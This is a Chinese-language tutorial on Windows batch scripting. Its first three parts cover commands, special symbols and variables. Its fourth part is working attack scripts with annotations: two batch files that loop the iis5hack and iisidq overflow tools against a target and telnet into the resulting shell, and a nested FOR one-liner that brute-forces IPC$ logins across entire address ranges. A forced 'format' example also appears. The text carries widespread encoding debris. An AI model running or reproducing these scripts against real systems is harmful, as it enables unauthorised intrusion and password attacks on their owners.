該教程一共分為4大部分,第一部分是批處理的專用命令��,第二部分是特殊的符號與批處理��,第三部分是批處理與變量,第四部分是完整案例��。因為教程比較長��,所有在雜志上我們將分為兩次連載,本期首先刊登一��、二兩部分,敬請讀者注意。
第一部分:批處理的專用命令
批處理文件是將一系列命令按一定的順序集合為一個可執(zhí)行的文本文件��,其擴展名為BAT��。這些命令統(tǒng)稱批處理命令��,下面我就來給大家介紹一下批處理的命令��。
1、 REM
REM 是個注釋命令一般是用來給程序加上注解的��,該命令后的內容在程序執(zhí)行的時候將不會被顯示和執(zhí)行。例:
REM 你現(xiàn)在看到的就是注解��,這一句將不會被執(zhí)行��。在以后的例子中解釋的內容都REM 會放在REM后面��。請大家注意。
2��、 ECHO
ECHO 是一個回顯命令主要參數有OFF和 ON,一般用ECHO message來顯示一個特定的消息 ��。例:
Echo off
Rem 以上代表關閉回顯即不顯示所執(zhí)行的命令
Echo 這個就是消息。
Rem 以上代表顯示“這就是消息”這列字符
執(zhí)行結果:
C:/>ECHO.BAT
這個就是消息��。
3��、 GOTO
GOTO 即為跳轉的意思。在批處理中允許以“:XXX”來構建一個標號然后用GOTO :標號直接來執(zhí)行標號后的命令��。例
:LABEL
REM 上面就是名為LABEL的標號��。
DIR C:/
DIR D:/
GOTO LABEL
REM 以上程序跳轉標號LABEL處繼續(xù)執(zhí)行��。
4��、CALL
CALL 命令可以在批處理執(zhí)行過程中調用另一個批處理��,當另一個批處理執(zhí)行完后再繼續(xù)執(zhí)行原來的批處理��。例:
批處理2.BAT內容如下:
ECHO 這就是2的內容
批處理1.BAT內容如下:
ECHO 這是1的內容
CALL 2.BAT
ECHO 1和2的內容全部顯示完成
執(zhí)行結果如下:
C:/>1.BAT
這是1的內容
這就是2的內容
1和2的內容全部顯示完成
5��、PAUSE
PAUSE 停止系統(tǒng)命令的執(zhí)行并顯示下面的內容��。例:
C:/> PAUSE
請按任意鍵繼續(xù) . . .
6、 IF
IF 條件判斷語句��,語法格式如下:
IF [NOT] ERRORLEVEL number command
IF [NOT] string1==string2 command
IF [NOT] EXIST filename command
說明:
[NOT] 將返回的結果取反值即“如果沒有”的意思��。
ERRORLEVEL 是命令執(zhí)行完成后返回的退出值
Number 退出值的數字取值范圍0~255��。判斷時值的排列順序應該又大到小��。返回的值大于或等于指定的值時條件成立。
string1==string2 string1和string2都為字符的數據��,英文字符的大小寫將看做不同,這個條件中的等于號必須是2個(絕對相等)��,條件想等后即執(zhí)行后面的 command
EXIST filename 為文件或目錄存在的意思。
IF ERRORLEVEL這條語句必須放在某一個命令后面��。執(zhí)行命令后由IF ERRORLEVEL來判斷命令的返回值。
例:
1��、 IF [NOT] ERRORLEVEL number command
檢測命令執(zhí)行完后的返回值做出判斷��。
echo off
dir z:
rem 如果退出代碼為1(不成功)就跳至標題1處執(zhí)行
IF ERRORLEVEL 1 goto 1
rem 如果退出代碼為0(成功)就跳至標題0處執(zhí)行
IF ERRORLEVEL 0 goto 0
:0
echo 命令執(zhí)行成功��!
Rem 程序執(zhí)行完畢跳至標題exit處退出
goto exit
:1
echo 命令執(zhí)行失?�。?
Rem 程序執(zhí)行完畢跳至標題exit處退出
goto exit
:exit
Rem 這里是程序的出口
2��、 IF string1==string2 command
檢測當前變量的值做出判斷
ECHO OFF
IF %1==2 goto no
Echo 變量相等��!
Goto exit
:no
echo 變量不相等
goto exit
:exit
大家可以這樣看效果 C:/>test.bat 數字
3��、 IF [NOT] EXIST filename command
發(fā)現(xiàn)特定的文件做出判斷
echo off
IF not EXIST autoexec.bat goto 1
echo 文件存在成功��!
goto exit
:1
echo 文件不存在失?�。?
goto exit
:exit
這個批處理大家可以放在c盤和d盤分別執(zhí)行看看效果��。
7��、 FOR
FOR這個命令比較特殊是一個循環(huán)執(zhí)行命令的命令��,同時FOR的循環(huán)里面還可以套用FOR在進行循環(huán)。這篇我們介紹基本的用法就不做套用的循環(huán)了��,后面再來講解套用的循環(huán)。在批處理中FOR的命令如下:
FOR [%%c] IN (set) DO [command] [arguments]
在命令行中命令如下:
FOR [%c] IN (set) DO [command] [arguments]
常用參數:
/L 該集表示以增量形式從開始到結束的一個數字序列��。因此,(1,1,5) 將產生序列 1 2 3 4 5��,(5,-1,1) 將產生序列 (5 4 3 2 1)��。
/D 如果集中包含通配符��,則指定與目錄名匹配��,而不與文件名匹配��。
/F 從指定的文件中讀取數據作為變量
eol=c - 指一個行注釋字符的結尾(就一個)
skip=n - 指在文件開始時忽略的行數。
delims=xxx - 指分隔符集��。這個替換了空格和跳格鍵的默認分隔符集��。
tokens=x,y,m-n - 指每行的哪一個符號被傳遞到每個迭代的 for 本身。這會導致額外變量名稱的分配��。m-n格式為一個范圍��。通過 nth 符號指定 mth��。如果符號字符串中的最后一個字符星號��,那么額外的變量將在最后一個符號解析之后分配并接受行的保留文本。
usebackq - 指定新語法已在下類情況中使用:在作為命令執(zhí)行一個后引號的字符串并且一個單引號字符為文字字符串命令并允許在 filenameset中使用雙引號擴起文件名稱��。
下面來看一個例子:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k
會分析 myfile.txt 中的每一行��,忽略以分號打頭的那些行��,將每行中的第二個和第三個符號傳遞給 for 程序體;用逗號和/或空格定界符號��。請注意,這個 for 程序體的語句引用 %i 來取得第二個符號��,引用 %j 來取得第三個符號��,引用 %k來取得第三個符號后的所有剩余符號��。對于帶有空格的文件名��,您需要用雙引號將文件名括起來。為了用這種方式來使用雙引號��,您還需要使用 usebackq 選項��,否則,雙引號會被理解成是用作定義某個要分析的字符串的��。
%i 專門在 for 語句中得到說明��,%j 和 %k 是通過tokens= 選項專門得到說明的��。您可以通過 tokens= 一行指定最多 26 個符號,只要不試圖說明一個高于字母 'z' 或'Z' 的變量��。請記住��,F(xiàn)OR 變量名分大小寫��,是通用的��;而且���,同時不能有 52 個以上都在使用中�����。
您還可以在相鄰字符串上使用 FOR /F 分析邏輯���;方法是,用單引號將括號之間的 filenameset 括起來�����。這樣���,該字符串會被當作一個文件中的一個單一輸入行���。最后�����,您可以用 FOR /F 命令來分析命令的輸出���。方法是�,將括號之間的 filenameset 變成一個反括字符串����。該字符串會被當作命令行,傳遞到一個子 CMD.EXE�,其輸出會被抓進內存,并被當作文件分析�。因此��,以下例子:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
會枚舉當前環(huán)境中的環(huán)境變量名稱��。
以下列舉一個簡單的例子�����,他將說明參數/L和沒有參數的區(qū)別:
刪除文件1.TXT 2.TXT 3.TXT 4.TXT 5.TXT
例:
ECHO OFF
FOR /L %%F IN (1,1,5) DO DEL %%F.TXT
或
FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT
以上2條命令執(zhí)行的結果都是一樣的如下:
C:/>DEL 1.TXT
C:/>DEL 2.TXT
C:/>DEL 3.TXT
C:/>DEL 4.TXT
C:/>DEL 5.TXT
8�����、 SETLOCAL
開始批處理文件中環(huán)境改動的本地化操作。在執(zhí)行 SETLOCAL 之后
所做的環(huán)境改動只限于批處理文件。要還原原先的設置�,必須執(zhí)
行 ENDLOCAL�����。 達到批處理文件結尾時���,對于該批處理文件的每個
尚未執(zhí)行的 SETLOCAL 命令,都會有一個隱含的 ENDLOCAL 被
執(zhí)行����。例:
@ECHO OFF
SET PATH /*察看環(huán)境變量PATH
PAUSE
SETLOCAL
SET PATH=E:/TOOLS /*重新設置環(huán)境變量PATH
SET PATH
PAUSE
ENDLOCAL
SET PATH
從上例我們可以看到環(huán)境變量PATH第1次被顯示得時候是系統(tǒng)默認路徑。被設置成了E:/TOOLS后顯示為E:/TOOLS但當ENDLOCAL后我們可以看到他又被還原成了系統(tǒng)的默認路徑�����。但這個設置只在該批處理運行的時候有作用����。當批處理運行完成后環(huán)境變量PATH將會還原���。
9�、 SHIFT
SHIFT命令可以讓在命令上的的命令使用超過10個(%0~%9)以上的可替代參數例:
ECHO OFF
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
執(zhí)行結果如下:
C::/>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11
1 2 3 4 5 6 7 8 9
2 3 4 5 6 7 8 9 10
3 4 5 6 7 8 9 10 11
以上就是基于WIN2000下的9個批處理命令����。
第二部分:特殊的符號與批處理
在命令行下有些符號是不允許使用的但有些符號卻有著特殊的意義。
1�����、 符號(@)
@在批處理中的意思是關閉當前行的回顯�����。我們從上面知道用命令echo off可以關掉整個批處理的命令回顯但卻不能不顯示echo off這個命令。現(xiàn)在我們在這個命令前加上@這樣echo off這一命令就被@關閉了回顯從而達到所有命令均不回顯得要求
2��、 符號(>)
>的意思是傳遞并覆蓋�。他所起的作用是將運行后的回顯結果傳遞到后面的范圍(后面可是文件也可是默認的系統(tǒng)控制臺)例:
文件1.txt的文件內容為:
1+1
使用命令c:/>dir *.txt >1.txt
這時候1.txt的內容如下
驅動器 C 中的卷沒有標簽����。
卷的序列號是 301A-1508
C:/ 的目錄
2003-03-11 14:04 1,005 FRUNLOG.TXT
2003-04-04 16:38 18,598,494 log.txt
2003-04-04 17:02 5 1.txt
2003-03-12 11:43 0 aierrorlog.txt
2003-03-30 00:35 30,571 202.108.txt
5 個文件 18,630,070 字節(jié)
0 個目錄 1,191,542,784 可用字節(jié)
>將命令執(zhí)行的結果覆蓋了原始的文件內容�����。
在傳遞給控制臺的時候程序將不會有任何回顯(注意:這里的回顯跟echo off關掉的回顯不是同一概念。Echo off關掉的是輸入命令的回顯���,這里的回顯是程序執(zhí)行中或后的回顯)例:
C:/>dir *.txt >nul
程序將沒有任何顯示也不會產生任何痕跡�。
3����、 符號(>>)
符號>>的作用與符號>相似�����,但他們的區(qū)別在于>>是傳遞并在文件末尾追加>>也可將回顯傳遞給控制臺(用法同上)例:
文件1.txt內同為:
1+1
使用命令c:/>dir *.txt >>1.txt
這時候1.txt的內容如下
1+1
驅動器 C 中的卷沒有標簽����。
卷的序列號是 301A-1508
C:/ 的目錄
2003-03-11 14:04 1,005 FRUNLOG.TXT
2003-04-04 16:38 18,598,494 log.txt
2003-04-04 17:02 5 1.txt
2003-03-12 11:43 0 aierrorlog.txt
2003-03-30 00:35 30,571 202.108.txt
5 個文件 18,630,070 字節(jié)
0 個目錄 1,191,542,784 可用字節(jié)
>>將命令執(zhí)行的結果覆加在了原始的文件內容后面�����。
4���、 符號(|)
|是一個管道傳輸命令意思是將上一命令執(zhí)行的結果傳遞給下一命令去處理。例:
C:/>dir c:/|find "1508"
卷的序列號是 301A-1508
以上命令的意思為查找c:/的所有并發(fā)現(xiàn)1508字符串��。Find的用法請用 find /?自行查看
在不使用format的自動格式化參數的時候我是這樣來自動格式化盤片的
echo y|fornat a: /s /q /v:system
用過format命令的人都知道format有一個交互對化過程,要使用者輸入y來確定當前的命令是否被執(zhí)行����。在這個命令前加上echo y并用管道傳輸符|將echo執(zhí)行的結果y傳遞給format從而達到手工輸入y的目的(這條命令有危害性,測試的時候請謹慎)
5���、 符號(^)
^ 是對特殊符號 > 、<�����、 &����、的前導字符�����。在命令中他將以上的3個符號的特殊動能去掉僅僅只吧他們當成符號而不使用他們的特殊意義。例:
c:/>echo test ^> 1.txt
test > 1.txt
從上面可以看出并沒有把test寫入文件1.txt而是將test >1.txt 當字符串顯示了出來��。這個符號在遠程構建批處理的時候很有效果��。
6、 符號(&)
&符號允許在一行中使用2個以上不同的命令����,當第一個命令執(zhí)行失敗將不影響第2個命令的執(zhí)行。例:
c:/> dir z:/ &dir y:/ &dir c:/
以上的命令將會連續(xù)顯示z: y: c:盤內的內容不理會該盤符是否存在���。
7�、 符號(&&)
&&符號也是允許在一行中使用2個以上不同的命令,當第一個命令執(zhí)行失敗后后續(xù)的命令將不會再被執(zhí)行�。例:
c:/> dir z:/ &&dir y:/ &&dir c:/
以上的命令將會提示檢查是否存在z:盤如果存在則執(zhí)行,如果不存在則停止執(zhí)行所有的后續(xù)命令
8��、 符號(" ")
" "符號允許在字符串中包含空格�����。進入一個特殊的目錄可以用如下方法例:
c:/>cd “Program Files”
c:/>cd progra~1
c:/>cd pro*
以上方法都可以進入Program Files目錄
9、 符號(,)
,符號相當于空格�����。在某些特殊的情況下可以用,來代替空格使用�。例:
c:/>dir,c:/
10����、 符號(;)
;符號當命令相同的時候可以將不同的目標用;隔離開來但執(zhí)行效果不變�。如執(zhí)行過程中發(fā)生錯誤則只返回錯誤報告但程序還是會繼續(xù)執(zhí)行�����。例:
DIR C:/;D:/;E:/F:/
以上的命令相當于
DIR C:/
DIR D:/
DIR E:/
DIR F:/
當然還有些特殊的符號但他們的使用范圍很小我就不再這里一一的說明了���。
第三部分:批處理與變量
在批處理中適當的引用變量將會使你所編制的程序應用面更廣。批處理每次能處理的變量從%0~%9共10個�����。其中%0默認給批處理的文件名使用。除非在使用SHIFT命令后%0才能被%1所替代�����。引用shift命令的例子如果把%1前面多加上一個%0那么結果如下:
C::/>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11
SHIFT.BAT 1 2 3 4 5 6 7 8 9
1 2 3 4 5 6 7 8 9 10
2 3 4 5 6 7 8 9 10 11
系統(tǒng)是如何區(qū)分每個變量的呢���,系統(tǒng)區(qū)分變量的規(guī)則為字符串中間的空格�����,即只要發(fā)現(xiàn)空格就把空格前面的字符當作一個變量而空格后面的字符則作為另一個變量���。如果你的變量是一個當中包含空格的長目錄名這時候你需要用上一節(jié)特殊符號8中所用的引號將他圈起來����。例:
批處理內容為:
ECHO %1
ECHO %2
ECHO %3
輸入命令:
C:/>TEST “Program Files” Program Files
Program Files
Program
Files
在一個復雜的批處理中又可能同時使用的變量會超過10個這時候會和系統(tǒng)的規(guī)則想沖突那么這個問題怎么解決呢?在系統(tǒng)中還有一種變量稱之為環(huán)境變量(使用SET命令可以查看當前系統(tǒng)的環(huán)境變量)如當前系統(tǒng)目錄是%windir%或%SystemRoot%等�����。當同時使用的參數超過10個的時候�,我們可以把某些在后面的程序中還要調用的變量保存為環(huán)境變量�。具體用法如 SET A=%1 這樣我們就命名了一個新的環(huán)境變量A 在調用變量A的時候要%A%這樣調用��,環(huán)境變量不受SHIFT命令影響。如果要改變一個環(huán)境變量需要重新對其設置才能改變��。當然也可以進行變量與變量之間的傳遞來達到目的���。下面我們來看一個例子���,批處理如下:
ECHO OFF
SET PASS=%1
SHIFT
SET PASS1=%1
SHIFT
ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %PASS% %PASS1% %9
SET PASS=%PASS1% 變量的傳遞
SET PASS1=%9
SHIFT
ECHO %PASS% %PASS1% %9
使用命令:C:/>TEST A B 3 4 5 6 7 8 9 10 K L
A B 3 4 5 6 7 8 9 10 K 注意:這一行顯示了11個變量
A B L 在使用了3次SHIFT之后%9變成了L
B L 變量的傳遞后的結果
第四部分:完整案例
以上就是批處理的一些用法?��,F(xiàn)在我們把這些用法結合起來詳細的分析一下目前網上發(fā)布的一些批處理,看看他們是怎么運作的�。這里我將列舉三個例子來詳細分析����,為了保持程序的完整我的注釋會加在/*后面����。
例一
這個例子是利用iis5hack.exe對有.printer漏洞的主機進行溢出的批處理。用到的程序有iis5hack.exe和系統(tǒng)自帶的telnet.exe�。iis5hack的命令格式為:
iis5hack <目標ip> <目標端口> <目標版本> <溢出連接端口>目標版本為0-9這10個數字分別對應不同語言版本和sp的系統(tǒng)版本���,我們編制的批處理使用的命令格式為 <iis.bat 目標ip (開始版本號)>開始版本號可有可無���。程序如下�。
@echo off /*關閉命令回顯
if "%1%"=="" goto help /*判斷%1是否為空����,%1為目標ip
if "%2%"=="1" goto 1 /*判斷%2是否為1�,為1則跳轉標志1
if "%2%"=="2" goto 2 /*%2為開始版本號,如果沒有設置則
if "%2%"=="3" goto 3 /*如果存在則從匹配的地方開始執(zhí)行
if "%2%"=="4" goto 4
if "%2%"=="5" goto 5
if "%2%"=="6" goto 6
if "%2%"=="7" goto 7
if "%2%"=="8" goto 8
if not EXIST iis5hack.exe goto file /*沒有發(fā)現(xiàn)iis5hack.exe就執(zhí)行標志file段內容
ping %1 -n 1 | find "Received = 1" /*ping目標1次�����,從結果中發(fā)現(xiàn)Received = 1
if errorlevel 1 goto error /*如果返回代碼為1則執(zhí)行error段(代碼1為沒有發(fā)現(xiàn) 0為發(fā)現(xiàn)并成功執(zhí)行)
iis5hack %1 80 9 88 | find "good" /*開始溢出目標端口80 系統(tǒng)代碼9 溢出后連接端口88 在執(zhí)行結果中發(fā)現(xiàn)字符串”good”(溢出成功后才會有字符串good)
if not errorlevel 1 goto telnet /*如果沒有錯誤代碼1(溢出成功)就執(zhí)行telnet段的內容。
echo 操作系統(tǒng)類型 9 失敗! /否則顯示這一句
:8 /*以下代碼內容參照上面
iis5hack %1 80 8 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 8 失敗!
:7
iis5hack %1 80 7 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 7 失敗!
:6
iis5hack %1 80 6 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 6 失敗!
:5
iis5hack %1 80 5 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 5 失敗!
:4
iis5hack %1 80 4 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 4 失敗!
:3
iis5hack %1 80 3 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 3 失敗!
:2
iis5hack %1 80 2 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 2 失敗!
:1
iis5hack %1 80 1 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 1 失敗!
:0
iis5hack %1 80 0 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 0 失敗!
goto error
:telnet
telnet %1 88 /*開始連接目標ip的88端口
goto exit /*連接中斷后跳轉exit段
:error /*error段顯示錯誤后的幫助信息
echo 可能網絡不能連接或者對方以修補該漏洞!請按照下面的格式手工嘗試一次!
echo iis5hack [目標IP] [WEB端口] [系統(tǒng)類型] [開放端口]
ECHO 中文: 0
ECHO 中文+sp1: 1
ECHO 英文: 2
ECHO 英文+sp1: 3
ECHO 日語: 4
ECHO 日語+sp1: 5
ECHO 韓文: 6
ECHO 韓文+sp1: 7
ECHO 墨西哥語: 8
ECHO 墨西哥語+sp1: 9
goto exit /*跳轉exit段
:file /*file段顯示文件沒有發(fā)現(xiàn)的信息
echo 文件iis5hack.exe沒有發(fā)現(xiàn)!程序終止運行!
goto exit /*跳轉exit段
:help /*help段顯示本批處理的使用格式幫助
echo 本程序用法如下:
echo iis [目標ip]
echo iis [目標ip] [開始的號碼9-0]
:exit /*exit段為程序出口
這個批處理基本沒有什么循環(huán)只是一路走下來��。所以代碼比較長難度不大�!
例二
這個例子是用iisidq.exe對有idq漏洞的機器進行溢出的批處理。使用的程序有iisidq.exe和系統(tǒng)自帶的程序telnet.exe��。iisidq.exe的用法如下:
運行參數: 操作系統(tǒng)類型 目的地址 web端口 1 溢出監(jiān)聽端口 <輸入命令1>
其中,如果輸入命令參數沒有輸入,那么,默認為:"cmd.exe"。
其中操作系統(tǒng)類型類型的代碼范圍是0-14��。我們編制的批處理使用的命令格式為 <idq.bat 目標ip>程序如下:
@echo off /*同例一
if not EXIST iisidq.exe goto file /*同例一
if %1 == "" goto error /*同例一
ping %1 -n 1 | find "Received = 1" /*同例一
if errorlevel 1 goto error1 /*同例一
set b=%1 /*創(chuàng)建一個環(huán)境變量b,將變量%1的內容傳遞給環(huán)境變量b����。變量b的內容以后將是目標ip
set a=0 /*創(chuàng)建一個環(huán)境變量a并指定環(huán)境變量a為0�����。由于使用整個批處理的循環(huán)所以用a來做計數器�����。
:no /*no段開始
if %a%==0 set d=0 /*如果環(huán)境變量a=0則創(chuàng)建環(huán)境變量d設定環(huán)境變量d=0���。
if %a%==1 set d=1 /*環(huán)境變量d其實是操作系統(tǒng)類型代碼��,用計數器來控制其
if %a%==2 set d=2 /*變動�。
if %a%==3 set d=3
if %a%==4 set d=4
if %a%==5 set d=5
if %a%==6 set d=6
if %a%==7 set d=7
if %a%==9 set d=9
if %a%==10 set d=13
if %a%==11 set d=14
goto 0 /*變量傳遞完成后轉到標志0處運行
:1
echo 正在執(zhí)行第%d%項!與目標%b%不能連接!正在嘗試連接請等候......
:0 /*標志0開始
IISIDQ %d% %b% 80 1 99 |find "good" /*按格式發(fā)送溢出命令并在結果中發(fā)現(xiàn)字符串good(發(fā)送代碼成功才會有字符串good)
if errorlevel 1 goto 1 /*如果沒有good字符串則沒有發(fā)送成跳
/*轉標志1處繼續(xù)嘗試發(fā)送
ping 127.0.0.1 -n 8 >nul /*ping自己8次相當于延時8秒不顯示執(zhí)
/*行結果
echo 正在執(zhí)行第%d%項! /*報告正在溢出的操作系統(tǒng)類型
telnet %b% 99 /*連接溢出端口
echo. /*顯示一個空行
if %d%==14 goto error1 /*如果操作系統(tǒng)類型為14則跳轉error1處(循環(huán)出口)
if %d%==13 set a=11 /*開始用計數器對操作系統(tǒng)代碼重新附值
if %d%==9 set a=10
if %d%==7 set a=9
if %d%==6 set a=7
if %d%==5 set a=6
if %d%==4 set a=5
if %d%==3 set a=4
if %d%==2 set a=3
if %d%==1 set a=2
if %d%==0 set a=1
goto no /*附值完成跳轉no段執(zhí)行
:file /*以下都是出錯后的幫助提示
echo IIsidq.exe沒有發(fā)現(xiàn)!將該文件和本文件放在同一目錄!
goto exit
:error
echo 錯誤!目標ip不可識別!請使用下面的格式連接!
echo idq [目標IP]
goto exit
:error1
echo 連接沒有成功!可能目標機器已經修補了該漏洞或者網絡故障所至!
echo 請按照下面的格式手工嘗試!
echo iisidq [目標類型] [目標IP] [目標端口] [連接方式] [溢出端口]
echo telnet [目標ip] [溢出端口]
:exit /*整個程序的出口
這個批處理采用的整體循環(huán)掌握好計數器部分就掌握了這個批處理���。
例三
for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use //%1.%%a.%%b.%%c/ipc$ %%e /u:%%f
上面的命令為1條命令�����。大家可以看出該命令使用了4個FOR來套用的���。用法為:C:/>TEST.BAT 218 當輸入218回車后該命令會由第1個for取初始值0為%%a然后繼續(xù)取第2個for的初始值0為%%b繼續(xù)取第3個for的初始值1為%%c最后一個for是將userpass.txt中的第一段字符作為密碼%%e第二段字符作為用戶名%%f最后執(zhí)行命令 (這里我把上面的值都帶進去,設密碼為123 用戶名為 abc)
net usr //218.0.0.1/ipc$ 123 /u:abc
